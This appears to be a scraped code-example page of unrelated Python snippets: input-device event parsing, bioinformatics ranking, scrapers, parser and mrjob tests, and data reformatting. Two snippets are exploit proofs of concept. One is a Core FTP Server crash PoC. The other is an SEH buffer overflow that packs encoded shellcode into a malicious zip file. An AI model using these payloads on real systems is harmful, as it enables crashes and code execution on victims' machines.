            rotation = drs('rotation', 0)

            def assign_coord(point, value, invert, coords):
                cx, cy = coords
                if invert:
                    value = 1. - value
                if rotation == 0:
                    point[cx] = value
                elif rotation == 90:
                    point[cy] = value
                elif rotation == 180:
                    point[cx] = 1. - value
                elif rotation == 270:
                    point[cy] = 1. - value

            def assign_rel_coord(point, value, invert, coords):
                cx, cy = coords
                if invert:
                    value = -1 * value
                if rotation == 0:
                    point[cx] += value
                elif rotation == 90:
                    point[cy] += value
                elif rotation == 180:
                    point[cx] += -value
                elif rotation == 270:
                    point[cy] += -value

            def process_as_multitouch(tv_sec, tv_usec, ev_type,
                                      ev_code, ev_value):
                # sync event
                if ev_type == EV_SYN:
                    if ev_code == SYN_MT_REPORT:
                        if 'id' not in point:
                            return
                        l_points.append(point.copy())
                    elif ev_code == SYN_REPORT:
                        process(l_points)
                        del l_points[:]

                elif ev_type == EV_MSC and ev_code in (MSC_RAW, MSC_SCAN):
                    pass

                else:
                    # compute multitouch track
                    if ev_code == ABS_MT_TRACKING_ID:
                        point.clear()
                        point['id'] = ev_value
                    elif ev_code == ABS_MT_POSITION_X:
                        val = normalize(ev_value,
                                        range_min_position_x,
                                        range_max_position_x)
                        assign_coord(point, val, invert_x, 'xy')
                    elif ev_code == ABS_MT_POSITION_Y:
                        val = 1. - normalize(ev_value,
                                             range_min_position_y,
                                             range_max_position_y)
                        assign_coord(point, val, invert_y, 'yx')
                    elif ev_code == ABS_MT_ORIENTATION:
                        point['orientation'] = ev_value
                    elif ev_code == ABS_MT_BLOB_ID:
                        point['blobid'] = ev_value
                    elif ev_code == ABS_MT_PRESSURE:
                        point['pressure'] = normalize(ev_value,
                                                      range_min_pressure,
                                                      range_max_pressure)
                    elif ev_code == ABS_MT_TOUCH_MAJOR:
                        point['size_w'] = ev_value
                    elif ev_code == ABS_MT_TOUCH_MINOR:
                        point['size_h'] = ev_value

            def process_as_mouse_or_keyboard(
                tv_sec, tv_usec, ev_type, ev_code, ev_value):
                if ev_type == EV_SYN:
                    if ev_code == SYN_REPORT:
                        process([point])
                elif ev_type == EV_REL:
                    if ev_code == 0:
                        assign_rel_coord(point,
                            min(1., max(-1., ev_value / 1000.)),
                            invert_x, 'xy')
                    elif ev_code == 1:
                        assign_rel_coord(point,
                            min(1., max(-1., ev_value / 1000.)),
                            invert_y, 'yx')
                elif ev_type != EV_KEY:
                    if ev_code == ABS_X:
                        val = normalize(ev_value,
                                        range_min_abs_x,
                                        range_max_abs_x)
                        assign_coord(point, val, invert_x, 'xy')
                    elif ev_code == ABS_Y:
                        val = 1. - normalize(ev_value,
                                             range_min_abs_y,
                                             range_max_abs_y)
                        assign_coord(point, val, invert_y, 'yx')
                    elif ev_code == ABS_PRESSURE:
                        point['pressure'] = normalize(ev_value,
                                                      range_min_abs_pressure,
                                                      range_max_abs_pressure)
                else:
                    buttons = {
                        272: 'left',
                        273: 'right',
                        274: 'middle',
                        275: 'side',
                        276: 'extra',
                        277: 'forward',
                        278: 'back',
                        279: 'task',
                        330: 'touch',
                        320: 'pen'}

                    if ev_code in buttons.keys():
                        if ev_value:
                            if 'button' not in point:
                                point['button'] = buttons[ev_code]
                                point['id'] += 1
                                if '_avoid' in point:
                                    del point['_avoid']
                        elif 'button' in point:
                            if point['button'] == buttons[ev_code]:
                                del point['button']
                                point['id'] += 1
                                point['_avoid'] = True
                    else:
                        if ev_value == 1:
                            z = keyboard_keys[ev_code][-1
                                if 'shift' in Window._modifiers else 0]
                            if z == 'shift' or z == 'alt':
                                Window._modifiers.append(z)
                            dispatch_queue.append(('key_down', (
                                Keyboard.keycodes[z.lower()], ev_code,
                                keys_str.get(z, z), Window._modifiers)))
                        elif ev_value == 0:
                            z = keyboard_keys[ev_code][-1
                                if 'shift' in Window._modifiers else 0]
                            dispatch_queue.append(('key_up', (
                                Keyboard.keycodes[z.lower()], ev_code,
                                keys_str.get(z, z), Window._modifiers)))
                            if z == 'shift':
                                Window._modifiers.remove('shift')

            def process(points):
                if not is_multitouch:
                    dispatch_queue.append(('mouse_pos', (
                        points[0]['x'] * Window.width,
                        points[0]['y'] * Window.height)))

                actives = [args['id']
                           for args in points
                           if 'id' in args and '_avoid' not in args]
                for args in points:
                    tid = args['id']
                    try:
                        touch = touches[tid]
                        if touch.sx == args['x'] and touch.sy == args['y']:
                            continue
                        touch.move(args)
                        if tid not in touches_sent:
                            queue.append(('begin', touch))
                            touches_sent.append(tid)
                        queue.append(('update', touch))
                    except KeyError:
                        if '_avoid' not in args:
                            touch = HIDMotionEvent(device, tid, args)
                            touches[touch.id] = touch
                            if tid not in touches_sent:
                                queue.append(('begin', touch))
                                touches_sent.append(tid)

                for tid in list(touches.keys())[:]:
                    if tid not in actives:
                        touch = touches[tid]
                        if tid in touches_sent:
                            touch.update_time_end()
                            queue.append(('end', touch))
                            touches_sent.remove(tid)
                        del touches[tid]

            def normalize(value, vmin, vmax):
                return (value - vmin) / float(vmax - vmin)

            # open the input
            fd = open(input_fn, 'rb')

            # get the controler name (EVIOCGNAME)
            device_name = str(fcntl.ioctl(fd, EVIOCGNAME + (256 << 16),
                                      " " * 256)).split('\x00')[0]
            Logger.info('HIDMotionEvent: using <%s>' % device_name)

            # get abs infos
            bit = fcntl.ioctl(fd, EVIOCGBIT + (EV_MAX << 16), ' ' * sz_l)
            bit, = struct.unpack('Q', bit)
            is_multitouch = False
            for x in range(EV_MAX):
                # preserve this, we may want other things than EV_ABS
                if x != EV_ABS:
                    continue
                # EV_ABS available for this device ?
                if (bit & (1 << x)) == 0:
                    continue
                # ask abs info keys to the devices
                sbit = fcntl.ioctl(fd, EVIOCGBIT + x + (KEY_MAX << 16),
                                   ' ' * sz_l)
                sbit, = struct.unpack('Q', sbit)
                for y in range(KEY_MAX):
                    if (sbit & (1 << y)) == 0:
                        continue
                    absinfo = fcntl.ioctl(fd, EVIOCGABS + y +
                                          (struct_input_absinfo_sz << 16),
                                          ' ' * struct_input_absinfo_sz)
                    abs_value, abs_min, abs_max, abs_fuzz, \
                        abs_flat, abs_res = struct.unpack('iiiiii', absinfo)
                    if y == ABS_MT_POSITION_X:
                        is_multitouch = True
                        range_min_position_x = drs('min_position_x', abs_min)
                        range_max_position_x = drs('max_position_x', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range position X is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_MT_POSITION_Y:
                        is_multitouch = True
                        range_min_position_y = drs('min_position_y', abs_min)
                        range_max_position_y = drs('max_position_y', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range position Y is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_MT_PRESSURE:
                        range_min_pressure = drs('min_pressure', abs_min)
                        range_max_pressure = drs('max_pressure', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range pressure is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_X:
                        range_min_abs_x = drs('min_abs_x', abs_min)
                        range_max_abs_x = drs('max_abs_x', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range ABS X position is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_Y:
                        range_min_abs_y = drs('min_abs_y', abs_min)
                        range_max_abs_y = drs('max_abs_y', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range ABS Y position is %d - %d' % (
                                        device_name, abs_min, abs_max))
                    elif y == ABS_PRESSURE:
                        range_min_abs_pressure = drs(
                            'min_abs_pressure', abs_min)
                        range_max_abs_pressure = drs(
                            'max_abs_pressure', abs_max)
                        Logger.info('HIDMotionEvent: ' +
                                    '<%s> range ABS pressure is %d - %d' % (
                                        device_name, abs_min, abs_max))

            # init the point
            if not is_multitouch:
                point = {'x': .5, 'y': .5, 'id': 0, '_avoid': True}

            # read until the end
            while fd:

                data = fd.read(struct_input_event_sz)
                if len(data) < struct_input_event_sz:
                    break

                # extract each event
                for i in range(int(len(data) / struct_input_event_sz)):
                    ev = data[i * struct_input_event_sz:]

                    # extract timeval + event infos
                    infos = struct.unpack('LLHHi', ev[:struct_input_event_sz])

                    if is_multitouch:
                        process_as_multitouch(*infos)
                    else:
                        process_as_mouse_or_keyboard(*infos)
コード例 #33
0
def main(args):
    parser = argparse.ArgumentParser(
        description="Merge separate TF rankings for TF discovery")
    parser.add_argument("--network",
                        dest="network",
                        type=str,
                        default="./network.csv")  # Input: TF binding profiling
    parser.add_argument(
        "--interaction",
        dest="interaction",
        type=str,
        default="./interaction.txt")  # Input: Predicted interactions
    parser.add_argument("--ranks_table",
                        dest="ranks_table",
                        type=str,
                        default="./ranks_table.txt")  # Output

    opts = parser.parse_args(args[1:])
    with open(opts.network) as ins:
        lines = [line.split() for line in ins]
    inputNet = np.asarray(lines)

    with open(opts.interaction) as ins:
        lines = [line.split() for line in ins]
    inputInteract = np.asarray(lines)

    print inputNet.shape
    print inputInteract.shape

    # Generate the MElist and TFlist
    MElist = []
    TFlist = []
    for line in inputNet:
        MElist.append(line[0])
        for item in line[1:]:
            if item not in TFlist:
                TFlist.append(item)

    # Generate the importance score mastertable
    IStable = np.zeros((len(MElist), len(TFlist)), dtype=float)
    for line in inputInteract:
        IStable[MElist.index(line[1])][TFlist.index(line[0])] = float(line[2])

    # Calculate the ranks of TFs for each enzyme
    rankTable = []
    for line in IStable:
        rankTable.append(rankdata(line, method='average'))

    # Calculate the Wilcoxon signed-rank test
    rankTestList = []
    for i in range(len(TFlist)):
        for j in range(i + 1, len(TFlist)):
            TF_i = [row[i] for row in rankTable]
            TF_j = [row[j] for row in rankTable]
            statistic, pvalue = wilcoxon(TF_i,
                                         TF_j,
                                         zero_method='wilcox',
                                         correction=False)
            rankTestList.append([
                TFlist[i],
                sum(TF_i), TFlist[j],
                sum(TF_j), statistic, pvalue
            ])

    outfile = open(opts.ranks_table, 'w')
    '''
	outfile.write('MasterTable\t')
	for i in range(len(TFlist)):
		statement = TFlist[i] + '\t'
		outfile.write(statement)
	outfile.write('\n')
	for i in range(len(MElist)):
		statement = MElist[i] + '\t'
		for j in range(len(TFlist)):
			statement += rankTable[i][j].astype('str') + '\t'
		outfile.write(statement)
		outfile.write('\n')


	outfile.write('\n')
	outfile.write('\n')
	outfile.write('\n')
	outfile.write('\n')
	'''

    for i in range(len(rankTestList)):
        statement = rankTestList[i][0] + '\t' + str(
            rankTestList[i][1]) + '\t' + rankTestList[i][2] + '\t' + str(
                rankTestList[i][3]) + '\t' + str(
                    rankTestList[i][4]) + '\t' + str(rankTestList[i][5]) + '\n'
        outfile.write(statement)

    outfile.close()
コード例 #34
0
import simplejson as json
import sys
from collections import OrderedDict

#print 'Number of arguments:', len(sys.argv), 'arguments.'
#print 'Argument List:', str(sys.argv)

if len(sys.argv) != 2:
	print "Usage: export_sectorial input_file "
	sys.exit(1)

filename = sys.argv[1]

print "Reading from: " + filename
with open(filename, 'r') as f:
     data = json.load(f, object_pairs_hook=OrderedDict)
     
#print data

unitlist = json.loads("[]")

for i in range(len(data)):
	unit = dict();
	unit["comment"] = data[i]["isc"]
	unit["id"] = data[i]["id"]
	unitlist.append(unit)

filename = "sectorial_data.json"

print "Writing to: " + filename
with open(filename, 'w') as outfile:
コード例 #35
0
def extract_call_graphs(multi_params):
    asm_files = multi_params.file_list
    ftot = len(asm_files)
    ext_drive = multi_params.ext_drive
    
    pid = os.getpid()
    feature_file = 'data/' + str(pid) + "-" + multi_params.feature_file 
    log_file_name = 'data/' + str(pid) + "-" + multi_params.log_file
    log_file = open(log_file_name, 'w')
    
    print('Process ID: {:d} Graph Feature file: {:s}'.format(pid, feature_file))
    
    graph_lines = []
    graph_features = []
    graph_file = open('data/' + str(pid) + "-" + multi_params.graph_file, 'w') # write as a graphviz DOT format file
    
    with open(feature_file, 'w') as f:
        # write the column names for the csv file
        fw = writer(f)
        #colnames = ['filename','vertex_count','edge_count','delta_max','density','diameter']
        #colnames = ['file_name','vertex_count','edge_count','delta_max','density']
        #fw.writerow(colnames) put in combine_feature_files
        
        # Now iterate through the file list and extract the call graph from each file.
        for idx, fname in enumerate(asm_files):
            fasm = open(ext_drive + fname, 'r') #, errors='ignore')
            lines = fasm.readlines()
            fasm.close()
            
            call_graph = construct_call_graph(lines, log_file)
            cgvc = call_graph.n_vertices()
            cgec = call_graph.n_edges()
            cgdm = call_graph.delta_max()
            cgde = call_graph.density()
            
            # cdia = call_graph.diameter() this is constantly problematic !!!
            
            fname_parts = fname.split('_') # Truncate the file name to the hash value.
            trunc_name = fname_parts[1]
            trunc_name = trunc_name[:trunc_name.find('.pe.asm')]
            
            graph_features.append([trunc_name] + [cgvc, cgec, cgdm, cgde])
            call_graph.set_graph_name(trunc_name)
            #graph_lines.append(call_graph.to_str('multinoleaf')) 
            graph_lines.append(call_graph.to_str('graphviz'))
            
            del(call_graph) # for some reason new graphs get appended to the previous graphs if not deleted???
            
            # Print progress
            if (idx + 1) % 100 == 0:
                print(pid, idx + 1, 'of', ftot, 'files processed.')
                fw.writerows(graph_features)
                graph_file.writelines(graph_lines)
                graph_features = []
                graph_lines = []
                
        # Write remaining files
        if len(graph_lines) > 0:
            fw.writerows(graph_features)
            graph_file.writelines(graph_lines)
            graph_features = []
            graph_lines = []

    graph_file.close()
    log_file.close()
    
    print('Process ID: {:d} finished.'.format(pid))
    
    return
コード例 #36
0
def _save_to_file(backup_file, backup):
    print("saving to file...")
    with open(backup_file, "w") as f:
        json.dump(backup, f)
コード例 #37
0
def development(cities, roads, airports):
    roads_list = []
    airports_list = []
    return roads_list, airports_list


if __name__ == "__main__":  
    parser = argparse.ArgumentParser()
    parser.add_argument("--cities", type=int, default=10, help="the number of cities")
    parser.add_argument("--roads", type=str, default="./roads.pk", help="road information")
    parser.add_argument("--airports",type =str, default = './airports.pk', help ="airports information")
    opt = parser.parse_args()

    cities = opt.cities

    f1 = open(opt.roads,"rb")
    f2 = open(opt.airports,"rb")

    roads = pk.load(f1)
    airports = pk.load(f2)

    f1.close()
    f2.close()

    road_list, airport_list = development(cities, roads, airports)

    print("Roads : ", end = "")
    print(road_list)

    print("Airports : ", end = "")
    print(airport_list)
コード例 #38
0
ファイル: reformatCSV.py プロジェクト: mx60s/NBA-Project
import csv

statsFile = open("statsFile.csv")
statReader = csv.reader(statsFile)
newStats = open("reformatted.csv", "w+")

csv_header = "name, season, type, stat"
newStats.write(csv_header + "\n")

header = "season,age,team_id,lg_id,pos,g,gs,mp_per_g,fg_per_g,fga_per_g,fg_pct,fg3_per_g,fg3a_per_g,fg3_pct,fg2_per_g,fg2a_per_g,fg2_pct,efg_pct,ft_per_g,fta_per_g,ft_pct,orb_per_g,drb_per_g,trb_per_g,ast_per_g,stl_per_g,blk_per_g,tov_per_g,pf_per_g,pts_per_g,mp,per,ts_pct,fg3a_per_fga_pct,fta_per_fga_pct,orb_pct,drb_pct,trb_pct,ast_pct,stl_pct,blk_pct,tov_pct,usg_pct,ws-dum,ows,dws,ws,ws_per_48,bpm-dum,obpm,dbpm,bpm,vorp,name"
labels = header.split(",")

count = 0

for row in statReader:
    if count == 0:
        count += 1
        continue

    name = row[len(row) - 1]
    season = row[0]

    for i in range(len(row)):
        if labels[i] in ["season", "name"]:
            continue
        data = name + ", " + season + ", " + labels[i] + ", " + row[i]
        newStats.write(data + "\n")
    
    count += 1

newStats.close()
        },
                               ignore_index=True)
        SolarServer.test_click_static(
            "http://192.168.1.79/dropdown/dropdown_static.html")
        tmCurrentTime = time.time()
        dataDF = dataDF.append({
            'task': 'click',
            'time': time.time()
        },
                               ignore_index=True)
        SolarServer.test_click_static(
            "http://192.168.1.79/dropdown/dropdown_staticB.html")
        tmCurrentTime = time.time()

    SolarServer.tearDown()
    dataDF = dataDF.append(
        {
            'task': 'stop static ' + str(i),
            'time': time.time()
        },
        ignore_index=True)

#save data to file
# check if the file already exists
try:
    with open(fileName) as csvfile:
        print("This file already exists!")
except:
    dataDF.to_csv(fileName, sep=',', index=False)

print(dataDF)
コード例 #40
0
ファイル: scraper.py プロジェクト: GlinkaG/CeneoScrapper
            key: extract_feature(opinion, *args)
            for key, args in selectors.items()
        }
        features["opinion_id"] = int(opinion["data-entry-id"])
        features["purchased"] = True if features[
            "purchased"] == "Opinia potwierdzona zakupem" else False
        features["useful"] = int(features["useful"])
        features["useless"] = int(features["useless"])
        features["content"] = remove_whitespaces(features["content"])
        features["pros"] = remove_whitespaces(features["pros"])
        features["cons"] = remove_whitespaces(features["cons"])

        opinions_list.append(features)

    try:
        url = url_prefix + page_tree.select("a.pagination__next").pop()["href"]
    except IndexError:
        url = None

    print("url:", url)

with open("app/opinions/" + product_id + ".json", 'w', encoding="UTF-8") as fp:
    json.dump(opinions_list,
              fp,
              ensure_ascii=False,
              separators=(",", ": "),
              indent=4)

#print(len(opinions_list))
#for opinion in opinions_list:
#  pprint.pprint(opinion)
コード例 #41
0
#Exploit Title: Core FTP/SFTP Server 1.2 - Build 589.42 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-02-13
#Vendor Homepage: http://www.coreftp.com/
#Software Link: http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe
#Tested Version: v2-Build 673
#Tested on: Windows 7 Service Pack 1 x32

#Steps to produce the crash:
#1.- Run python code: Core_FTP_SFTP_Server_1.2.py
#2.- Open core_code.txt and copy content to clipboard
#3.- Open Core FTP Server
#4.- Select "Setup" > "New"
#5.- Select "Domain Name" and Put "Test"
#6.- Select "Domain IP/Address" and Put "1.1.1.1"
#7.- Select "Base directory" and Choose a directory path
#8.- Enable "WinNT users"
#9.- Select "User domain" and Paste Clipboard
#10.- Click on "Ok" and the next window click "Ok"
#11.- Crashed

cod = "\x41" * 7000

f = open('core_code.txt', 'w')
f.write(cod)
f.close()
コード例 #42
0
    start = time.time()
    URL = 'https://stream.emojitracker.com/subscribe/details/' + str(id)
    tweets = SSEClient(URL)
    results = []
    for tweet in tweets:
        tweetData = json.loads(tweet.data)
        if len(results) >= NUM_TWEETS:
            print("Finished for emoji {}. Time taken: {}".format(
                idToEmoji[id],
                time.time() - start))
            return results
        try:
            if detect(tweetData['text']) == 'en':
                results.append(tweetData['text'] + '\n')
        except LangDetectException:
            continue


idToEmoji = get_ids()
progress = 0
N = len(idToEmoji)
ids = list(idToEmoji.keys())
ids.reverse()
print("# of emojis to get tweets for: {}".format(N))

# Using multiprocessing to speed things up
pool = Pool(processes=8)
data = pool.map(get_tweets_id, ids)
data = [i for sublist in data for i in sublist]
with open('../data/best-twitter-data2.txt', 'w') as f:
    f.writelines(data)
コード例 #43
0
    def test_parse_many_findings(self):
        testfile = open("unittests/scans/mobsfscan/many_findings.json")
        parser = MobsfscanParser()
        findings = parser.get_findings(testfile, Test())
        testfile.close()
        self.assertEqual(7, len(findings))

        with self.subTest(i=0):
            finding = findings[0]
            self.assertEqual("android_certificate_transparency", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(295, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=1):
            finding = findings[1]
            self.assertEqual("android_kotlin_hardcoded", finding.title)
            self.assertEqual("Medium", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(798, finding.cwe)
            self.assertIsNotNone(finding.references)
            self.assertEqual("app/src/main/java/com/routes/domain/analytics/event/Signatures.kt", finding.file_path)
            self.assertEqual(10, finding.line)

        with self.subTest(i=2):
            finding = findings[2]
            self.assertEqual("android_prevent_screenshot", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(200, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=3):
            finding = findings[3]
            self.assertEqual("android_root_detection", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(919, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=4):
            finding = findings[4]
            self.assertEqual("android_safetynet", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(353, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=5):
            finding = findings[5]
            self.assertEqual("android_ssl_pinning", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(295, finding.cwe)
            self.assertIsNotNone(finding.references)

        with self.subTest(i=6):
            finding = findings[6]
            self.assertEqual("android_tapjacking", finding.title)
            self.assertEqual("Low", finding.severity)
            self.assertEqual(1, finding.nb_occurences)
            self.assertIsNotNone(finding.description)
            self.assertEqual(200, finding.cwe)
            self.assertIsNotNone(finding.references)
コード例 #44
0
ファイル: mocks.py プロジェクト: zferenczik/taurus
 def dump_config(self):
     """ test """
     fname = temp_file()
     self.config.dump(fname, Configuration.JSON)
     with open(fname) as fh:
         ROOT_LOGGER.debug("JSON:\n%s", fh.read())
コード例 #45
0
    def setUp(self):
        super(MRJobFileOptionsTestCase, self).setUp()

        self.input_file_path = os.path.join(self.tmp_dir, 'input_file.txt')
        with open(self.input_file_path, 'wb') as f:
            f.write(b'2\n')
コード例 #46
0
 def test_parse_no_findings(self):
     testfile = open("unittests/scans/mobsfscan/no_findings.json")
     parser = MobsfscanParser()
     findings = parser.get_findings(testfile, Test())
     testfile.close()
     self.assertEqual(0, len(findings))
コード例 #47
0
    template.insert(start_index, updated_html_code)
    return template


if __name__ == "__main__":
    week = raw_input("Week ID:")
    problem = raw_input("Problem ID:")
    input_file_name = "markdown_files/Week{0}_Problem{1}.md".format(
        week, problem)
    output_file_name = "output_files/Week{0}_Problem{1}.xml".format(
        week, problem)
    #input_file_name = "markdown_files/sample.md"
    #output_file_name = "output_files/sample_output.xml"
    template_file = "template_w_variables.xml"

    f = open(template_file, "r")
    template = f.readlines()
    f.close()

    f = open(input_file_name, "r")
    contents = f.readlines()
    f.close()

    print "generating XML"

    py_code, html_code = read_md(contents)
    template.insert(4, py_code)
    template = convert_html(html_code, template)

    print "writing files ..."
コード例 #48
0
    def test_jobconf_simulated_by_runner(self):
        input_path = os.path.join(self.tmp_dir, 'input')
        with open(input_path, 'wb') as input_file:
            input_file.write(b'foo\n')

        upload_path = os.path.join(self.tmp_dir, 'upload')
        with open(upload_path, 'wb') as upload_file:
            upload_file.write(b'PAYLOAD')

        # use --no-bootstrap-mrjob so we don't have to worry about
        # mrjob.tar.gz and the setup wrapper script
        self.add_mrjob_to_pythonpath()
        mr_job = MRTestJobConf([
            '-r', self.RUNNER, '--no-bootstrap-mrjob',
            '--jobconf=user.defined=something', '--jobconf=mapred.map.tasks=1',
            '--file', upload_path, input_path
        ])

        mr_job.sandbox()

        results = {}

        # between the single line of input and setting mapred.map.tasks to 1,
        # we should be restricted to only one task, which will give more
        # predictable results

        with mr_job.make_runner() as runner:
            script_path = runner._script_path

            runner.run()

            results.update(dict(mr_job.parse_output(runner.cat_output())))

        working_dir = results['mapreduce.job.local.dir']
        self.assertEqual(
            working_dir,
            os.path.join(runner._get_local_tmp_dir(), 'job_local_dir', '0',
                         'mapper', '0'))

        self.assertEqual(results['mapreduce.job.cache.archives'], '')
        expected_cache_files = [
            script_path + '#mr_test_jobconf.py', upload_path + '#upload'
        ] + [
            '%s#%s' % (path, name)
            for path, name in self._extra_expected_local_files(runner)
        ]
        self.assertEqual(
            sorted(results['mapreduce.job.cache.files'].split(',')),
            sorted(expected_cache_files))
        self.assertEqual(results['mapreduce.job.cache.local.archives'], '')
        expected_local_files = [
            os.path.join(working_dir, 'mr_test_jobconf.py'),
            os.path.join(working_dir, 'upload')
        ] + [
            os.path.join(working_dir, name)
            for path, name in self._extra_expected_local_files(runner)
        ]
        self.assertEqual(
            sorted(results['mapreduce.job.cache.local.files'].split(',')),
            sorted(expected_local_files))
        self.assertEqual(results['mapreduce.job.id'], runner._job_key)

        self.assertEqual(results['mapreduce.map.input.file'], input_path)
        self.assertEqual(results['mapreduce.map.input.length'], '4')
        self.assertEqual(results['mapreduce.map.input.start'], '0')
        self.assertEqual(results['mapreduce.task.attempt.id'],
                         'attempt_%s_mapper_00000_0' % runner._job_key)
        self.assertEqual(results['mapreduce.task.id'],
                         'task_%s_mapper_00000' % runner._job_key)
        self.assertEqual(results['mapreduce.task.ismap'], 'true')
        self.assertEqual(results['mapreduce.task.output.dir'],
                         runner._output_dir)
        self.assertEqual(results['mapreduce.task.partition'], '0')
        self.assertEqual(results['user.defined'], 'something')
コード例 #49
0
seh = "\x31\x48"  #ppr 0x00480031
nextseh = "\x58\x70"
venetian = ("\x55\x55"
            "\x70"
            "\x58"
            "\x70"
            "\x05\x25\x11"
            "\x55"
            "\x2d\x19\x11"
            "\x55"
            "\x50"
            "\x55"
            "\xc7")
shellcode = (
    "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
    "AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
    "BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
    "TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
    "3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
    "QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
    "K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
    "2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
    "60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
    "KKK045M5WKQ7N3RRRORJM0QCKOHUA")
buffer = "\x41" * (205 + 216) + shellcode + "\x41" * (2000 - 216 - len(
    shellcode)) + nextseh + seh + venetian + "\x42" * (6173 - len(venetian))
print len(buffer)
payload = buffer
mefile = open('seh_winarch.zip', 'w')
mefile.write(zip_header + buffer + zip_final)
mefile.close()
コード例 #50
0
 def mapper_init(self):
     with open(self.options.platform_file) as f:
         self.multiplier = int(f.read())
コード例 #51
0
if __name__ == "__main__":
    cmd_set_sleep(0)
    cmd_firmware_ver()
    cmd_set_working_period(PERIOD_CONTINUOUS)
    cmd_set_mode(MODE_QUERY)
    while True:
        cmd_set_sleep(0)
        for t in range(15):
            values = cmd_query_data()
            for i in range(len(values) - 1):
                print("PM2.5: ", values[0], ", PM10: ", values[1])
                time.sleep(2)

        # open stored data
        try:
            with open(JSON_FILE) as json_data:
                data = json.load(json_data)
        except IOError as e:
            data = []

        # check if length is more than 100 and delete first element
        if len(data) > 100:
            data.pop(0)

        # append new values
        jsonrow = {
            'pm25': values[0],
            'pm10': values[1],
            'time': time.strftime("%d.%m.%Y %H:%M:%S")
        }
        data.append(jsonrow)
コード例 #52
0
ファイル: setup.py プロジェクト: viananth/azure-cli
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: 3.4',
    'Programming Language :: Python :: 3.5',
    'Programming Language :: Python :: 3.6',
    'License :: OSI Approved :: MIT License',
]

DEPENDENCIES = [
    'azure-cli-core',
    'azure-mgmt-resource==1.1.0',
    'azure-mgmt-storage==1.2.0',
    'azure-mgmt-containerregistry==0.3.1',
]

with open('README.rst', 'r', encoding='utf-8') as f:
    README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
    HISTORY = f.read()

setup(name='azure-cli-acr',
      version=VERSION,
      description='Microsoft Azure Command-Line Tools ACR Command Module',
      long_description=README + '\n\n' + HISTORY,
      license='MIT',
      author='Microsoft Corporation',
      author_email='*****@*****.**',
      url='https://github.com/Azure/azure-cli',
      classifiers=CLASSIFIERS,
      packages=[
          'azure',
コード例 #53
0
 def _find_vim_key(vim_id):
     key_file = os.path.join(CONF.vim_keys.openstack, vim_id)
     LOG.debug(_('Attempting to open key file for vim id %s'), vim_id)
     with open(key_file, 'r') as f:
         return f.read()
     LOG.warning(_('VIM id invalid or key not found for  %s'), vim_id)
コード例 #54
0
ファイル: bot.py プロジェクト: Prince-of-Galar/ChattyBot
def loadKeywords():
    tmpm = []
    # Open the keywords text file
    with open('./data/keywords.txt','r') as f:
        tempm = f.read().split(' | ')
    return tempm
コード例 #55
0
import csv


def isBlank(myString):
    return not (myString and myString.strip())


filer = open('ICUSTAYS.csv')
filew = open('ICUSTAYS_table.csv', 'wb')

try:
    inputnum = 0
    outputnum = 0
    reader = csv.DictReader(filer)
    reader.next()
    #skiping fields name
    fieldsname = [
        'SUBJECT_ID', 'ICUSTAY_ID', 'DBSOURCE', 'FIRST_CAREUNIT',
        'LAST_CAREUNIT', 'FIRST_WARDID', 'LAST_WARDID', 'LOS', 'INTIME',
        'OUTTIME'
    ]
    writer = csv.DictWriter(filew, fieldnames=fieldsname)
